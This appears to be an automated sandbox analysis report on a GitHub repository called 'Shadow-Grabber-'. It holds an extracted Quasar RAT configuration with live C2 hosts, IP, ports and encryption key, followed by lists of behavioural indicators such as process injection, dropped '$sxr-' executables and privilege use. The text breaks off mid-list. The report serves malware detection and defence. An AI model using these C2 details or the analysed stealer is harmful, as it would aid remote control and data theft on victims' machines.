Resubmissions
30-06-2024 20:33
240630-zb2tcsxhrk 730-06-2024 20:26
240630-y78q4svarb 1030-06-2024 20:25
240630-y7p9rsxgjm 1Analysis
-
max time kernel
217s -
max time network
246s -
platform
windows11-21h2_x64 -
resource
win11-20240611-en -
resource tags
arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system -
submitted
30-06-2024 20:26
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/Excalisz/Shadow-Grabber-
Resource
win11-20240611-en
General
-
Target
https://github.com/Excalisz/Shadow-Grabber-
Malware Config
Extracted
quasar
1.0.0.0
v2.2.6 | Tinsler
throbbing-mountain-09011.pktriot.net:22112
167.71.56.116:22112
throbbing-mountain-09011.pktriot.net:5050
cf16a257-7d89-4296-8384-8fca3dbb568f
-
encryption_key
045F98A287DD47B8B5C074D234995A2C5A913042
-
install_name
.exe
-
log_directory
$sxr-Logs
-
reconnect_delay
1000
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/4976-619-0x000001B3429E0000-0x000001B3431AA000-memory.dmp family_quasar -
Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 6740 created 6604 6740 WerFault.exe dllhost.exe PID 7116 created 7008 7116 WerFault.exe dllhost.exe PID 2328 created 6108 2328 WerFault.exe dllhost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 15 IoCs
Processes:
Shadow-Stealer.bat.exe$sxr-powershell.exesvchost.exeShadow-Stealer.bat.exedescription pid process target process PID 4820 created 628 4820 Shadow-Stealer.bat.exe winlogon.exe PID 4976 created 628 4976 $sxr-powershell.exe winlogon.exe PID 4976 created 628 4976 $sxr-powershell.exe winlogon.exe PID 4820 created 628 4820 Shadow-Stealer.bat.exe winlogon.exe PID 4976 created 628 4976 $sxr-powershell.exe winlogon.exe PID 4976 created 628 4976 $sxr-powershell.exe winlogon.exe PID 6676 created 6604 6676 svchost.exe dllhost.exe PID 4976 created 628 4976 $sxr-powershell.exe winlogon.exe PID 6676 created 7008 6676 svchost.exe dllhost.exe PID 4976 created 628 4976 $sxr-powershell.exe winlogon.exe PID 6676 created 6108 6676 svchost.exe dllhost.exe PID 5832 created 628 5832 Shadow-Stealer.bat.exe winlogon.exe PID 4976 created 628 4976 $sxr-powershell.exe winlogon.exe PID 6676 created 6260 6676 svchost.exe dllhost.exe PID 5832 created 628 5832 Shadow-Stealer.bat.exe winlogon.exe -
Executes dropped EXE 7 IoCs
Processes:
Shadow-Stealer.bat.exe$sxr-mshta.exe$sxr-cmd.exe$sxr-powershell.exe$sxr-powershell.exeShadow-Stealer.bat.exeShadow-Stealer.bat.exepid process 4820 Shadow-Stealer.bat.exe 2536 $sxr-mshta.exe 3944 $sxr-cmd.exe 4976 $sxr-powershell.exe 3832 $sxr-powershell.exe 5832 Shadow-Stealer.bat.exe 6452 Shadow-Stealer.bat.exe -
Hide Artifacts: Hidden Window 1 TTPs 4 IoCs
Windows that would typically be displayed when an application carries out an operation can be hidden.
Processes:
$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exe$sxr-powershell.exepid process 4976 $sxr-powershell.exe 3832 $sxr-powershell.exe 5684 $sxr-powershell.exe 1504 $sxr-powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 1 raw.githubusercontent.com 12 raw.githubusercontent.com 33 raw.githubusercontent.com -
Drops file in System32 directory 5 IoCs
Processes:
svchost.exesvchost.exedescription ioc process File opened for modification C:\Windows\System32\Tasks\$sxr-tjptoUybjVuvgCOJtIWn svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx svchost.exe -
Suspicious use of SetThreadContext 22 IoCs
Processes:
Shadow-Stealer.bat.exe$sxr-powershell.exeShadow-Stealer.bat.exedescription pid process target process PID 4820 set thread context of 3408 4820 Shadow-Stealer.bat.exe dllhost.exe PID 4820 set thread context of 996 4820 Shadow-Stealer.bat.exe dllhost.exe PID 4976 set thread context of 4088 4976 $sxr-powershell.exe dllhost.exe PID 4976 set thread context of 248 4976 $sxr-powershell.exe dllhost.exe PID 4976 set thread context of 4700 4976 $sxr-powershell.exe dllhost.exe PID 4976 set thread context of 5564 4976 $sxr-powershell.exe dllhost.exe PID 4820 set thread context of 4000 4820 Shadow-Stealer.bat.exe dllhost.exe PID 4820 set thread context of 2316 4820 Shadow-Stealer.bat.exe dllhost.exe PID 4976 set thread context of 5384 4976 $sxr-powershell.exe dllhost.exe PID 4976 set thread context of 6552 4976 $sxr-powershell.exe dllhost.exe PID 4976 set thread context of 6604 4976 $sxr-powershell.exe dllhost.exe PID 4976 set thread context of 6968 4976 $sxr-powershell.exe dllhost.exe PID 4976 set thread context of 7008 4976 $sxr-powershell.exe dllhost.exe PID 4976 set thread context of 5572 4976 $sxr-powershell.exe dllhost.exe PID 4976 set thread context of 6108 4976 $sxr-powershell.exe dllhost.exe PID 4976 set thread context of 6260 4976 $sxr-powershell.exe dllhost.exe PID 5832 set thread context of 5812 5832 Shadow-Stealer.bat.exe dllhost.exe PID 5832 set thread context of 5920 5832 Shadow-Stealer.bat.exe dllhost.exe PID 4976 set thread context of 5232 4976 $sxr-powershell.exe dllhost.exe PID 4976 set thread context of 6992 4976 $sxr-powershell.exe dllhost.exe PID 5832 set thread context of 6460 5832 Shadow-Stealer.bat.exe dllhost.exe PID 5832 set thread context of 6656 5832 Shadow-Stealer.bat.exe dllhost.exe -
Drops file in Windows directory 12 IoCs
Processes:
Shadow-Stealer.bat.exeShadow-Stealer.bat.exedescription ioc process File created C:\Windows\$sxr-mshta.exe Shadow-Stealer.bat.exe File opened for modification C:\Windows\$sxr-mshta.exe Shadow-Stealer.bat.exe File opened for modification C:\Windows\$sxr-cmd.exe Shadow-Stealer.bat.exe File created C:\Windows\$sxr-powershell.exe Shadow-Stealer.bat.exe File created C:\Windows\$sxr-mshta.exe Shadow-Stealer.bat.exe File opened for modification C:\Windows\$sxr-mshta.exe Shadow-Stealer.bat.exe File created C:\Windows\$sxr-cmd.exe Shadow-Stealer.bat.exe File created C:\Windows\$sxr-cmd.exe Shadow-Stealer.bat.exe File opened for modification C:\Windows\$sxr-powershell.exe Shadow-Stealer.bat.exe File opened for modification C:\Windows\$sxr-cmd.exe Shadow-Stealer.bat.exe File created C:\Windows\$sxr-powershell.exe Shadow-Stealer.bat.exe File opened for modification C:\Windows\$sxr-powershell.exe Shadow-Stealer.bat.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 6088 6260 WerFault.exe dllhost.exe 5136 6056 WerFault.exe dllhost.exe -
Checks processor information in registry 2 TTPs 30 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exesvchost.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe -
Enumerates system info in registry 2 TTPs 11 IoCs
Processes:
WerFault.exemsedge.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 5040 taskkill.exe 2680 taskkill.exe 6564 taskkill.exe -
Processes:
Explorer.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE -
Modifies registry class 24 IoCs
Processes:
msedge.exeExplorer.EXEMiniSearchHost.exe$sxr-mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders Explorer.EXE Key created \Registry\User\S-1-5-21-1560405787-796225086-678739705-1000_Classes\NotificationData Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\MuiCache MiniSearchHost.exe Key created \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Downloads" Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ $sxr-mshta.exe Set value (data) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 3a002e8005398e082303024b98265d99428e115f260001002600efbe11000000f027567846bcda01e60448172ccbda01af8e84182ccbda0114000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff Explorer.EXE -
NTFS ADS 4 IoCs
Processes:
msedge.exemsedge.exemsedge.exedescription ioc process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 773041.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Shadow-Stealer.bat:Zone.Identifier msedge.exe File opened for modification C:\Users\Admin\Downloads\Unconfirmed 690217.crdownload:SmartScreen msedge.exe File opened for modification C:\Users\Admin\Downloads\Shadow-Stealer.bat:Zone.Identifier msedge.exe -
Runs ping.exe 1 TTPs 3 IoCs
Processes:
PING.EXEPING.EXEPING.EXEpid process 6104 PING.EXE 3744 PING.EXE 3948 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
Explorer.EXEpid process 3336 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exeShadow-Stealer.bat.exemsedge.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exepid process 3268 msedge.exe 3268 msedge.exe 2044 msedge.exe 2044 msedge.exe 4892 identity_helper.exe 4892 identity_helper.exe 4976 msedge.exe 4976 msedge.exe 4888 msedge.exe 4888 msedge.exe 4820 Shadow-Stealer.bat.exe 4820 Shadow-Stealer.bat.exe 1776 msedge.exe 1776 msedge.exe 1776 msedge.exe 1776 msedge.exe 4820 Shadow-Stealer.bat.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 3408 dllhost.exe 996 dllhost.exe 996 dllhost.exe 996 dllhost.exe 996 dllhost.exe 4820 Shadow-Stealer.bat.exe 4820 Shadow-Stealer.bat.exe 4976 $sxr-powershell.exe 4976 $sxr-powershell.exe 4976 $sxr-powershell.exe 4976 $sxr-powershell.exe 4976 $sxr-powershell.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 4088 dllhost.exe 248 dllhost.exe 248 dllhost.exe 248 dllhost.exe 248 dllhost.exe 4976 $sxr-powershell.exe 4976 $sxr-powershell.exe 3832 $sxr-powershell.exe 3832 $sxr-powershell.exe 4976 $sxr-powershell.exe 3832 $sxr-powershell.exe 4700 dllhost.exe 4700 dllhost.exe 4700 dllhost.exe 4700 dllhost.exe 4700 dllhost.exe 4700 dllhost.exe 4700 dllhost.exe 4700 dllhost.exe 5564 dllhost.exe 5564 dllhost.exe 5564 dllhost.exe 4700 dllhost.exe 4700 dllhost.exe 5564 dllhost.exe 4700 dllhost.exe 4700 dllhost.exe 5564 dllhost.exe 5564 dllhost.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
Processes:
msedge.exepid process 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Shadow-Stealer.bat.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exe$sxr-powershell.exedllhost.exedllhost.exedwm.exesvchost.exedescription pid process Token: SeDebugPrivilege 4820 Shadow-Stealer.bat.exe Token: SeDebugPrivilege 4820 Shadow-Stealer.bat.exe Token: SeDebugPrivilege 3408 dllhost.exe Token: SeDebugPrivilege 996 dllhost.exe Token: SeDebugPrivilege 4976 $sxr-powershell.exe Token: SeDebugPrivilege 4976 $sxr-powershell.exe Token: SeDebugPrivilege 4088 dllhost.exe Token: SeDebugPrivilege 248 dllhost.exe Token: SeDebugPrivilege 3832 $sxr-powershell.exe Token: SeDebugPrivilege 4976 $sxr-powershell.exe Token: SeDebugPrivilege 4700 dllhost.exe Token: SeDebugPrivilege 5564 dllhost.exe Token: SeShutdownPrivilege 428 dwm.exe Token: SeCreatePagefilePrivilege 428 dwm.exe Token: SeAssignPrimaryTokenPrivilege 2656 svchost.exe Token: SeIncreaseQuotaPrivilege 2656 svchost.exe Token: SeSecurityPrivilege 2656 svchost.exe Token: SeTakeOwnershipPrivilege 2656 svchost.exe Token: SeLoadDriverPrivilege 2656 svchost.exe Token: SeSystemtimePrivilege 2656 svchost.exe Token: SeBackupPrivilege 2656 svchost.exe Token: SeRestorePrivilege 2656 svchost.exe Token: SeShutdownPrivilege 2656 svchost.exe Token: SeSystemEnvironmentPrivilege 2656 svchost.exe Token: SeUndockPrivilege 2656 svchost.exe Token: SeManageVolumePrivilege 2656 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2656 svchost.exe Token: SeIncreaseQuotaPrivilege 2656 svchost.exe Token: SeSecurityPrivilege 2656 svchost.exe Token: SeTakeOwnershipPrivilege 2656 svchost.exe Token: SeLoadDriverPrivilege 2656 svchost.exe Token: SeSystemtimePrivilege 2656 svchost.exe Token: SeBackupPrivilege 2656 svchost.exe Token: SeRestorePrivilege 2656 svchost.exe Token: SeShutdownPrivilege 2656 svchost.exe Token: SeSystemEnvironmentPrivilege 2656 svchost.exe Token: SeUndockPrivilege 2656 svchost.exe Token: SeManageVolumePrivilege 2656 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2656 svchost.exe Token: SeIncreaseQuotaPrivilege 2656 svchost.exe Token: SeSecurityPrivilege 2656 svchost.exe Token: SeTakeOwnershipPrivilege 2656 svchost.exe Token: SeLoadDriverPrivilege 2656 svchost.exe Token: SeSystemtimePrivilege 2656 svchost.exe Token: SeBackupPrivilege 2656 svchost.exe Token: SeRestorePrivilege 2656 svchost.exe Token: SeShutdownPrivilege 2656 svchost.exe Token: SeSystemEnvironmentPrivilege 2656 svchost.exe Token: SeUndockPrivilege 2656 svchost.exe Token: SeManageVolumePrivilege 2656 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2656 svchost.exe Token: SeIncreaseQuotaPrivilege 2656 svchost.exe Token: SeSecurityPrivilege 2656 svchost.exe Token: SeTakeOwnershipPrivilege 2656 svchost.exe Token: SeLoadDriverPrivilege 2656 svchost.exe Token: SeSystemtimePrivilege 2656 svchost.exe Token: SeBackupPrivilege 2656 svchost.exe Token: SeRestorePrivilege 2656 svchost.exe Token: SeShutdownPrivilege 2656 svchost.exe Token: SeSystemEnvironmentPrivilege 2656 svchost.exe Token: SeUndockPrivilege 2656 svchost.exe Token: SeManageVolumePrivilege 2656 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2656 svchost.exe Token: SeIncreaseQuotaPrivilege 2656 svchost.exe -
Suspicious use of FindShellTrayWindow 45 IoCs
Processes:
msedge.exepid process 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe -
Suspicious use of SendNotifyMessage 12 IoCs
Processes:
msedge.exepid process 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe 2044 msedge.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
MiniSearchHost.exe$sxr-powershell.exeExplorer.EXEpid process 3604 MiniSearchHost.exe 4976 $sxr-powershell.exe 3336 Explorer.EXE 3336 Explorer.EXE 3336 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3336 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 2044 wrote to memory of 2808 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 2808 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 860 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 3268 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 3268 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 4848 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 4848 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 4848 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 4848 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 4848 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 4848 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 4848 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 4848 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 4848 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 4848 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 4848 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 4848 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 4848 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 4848 2044 msedge.exe msedge.exe PID 2044 wrote to memory of 4848 2044 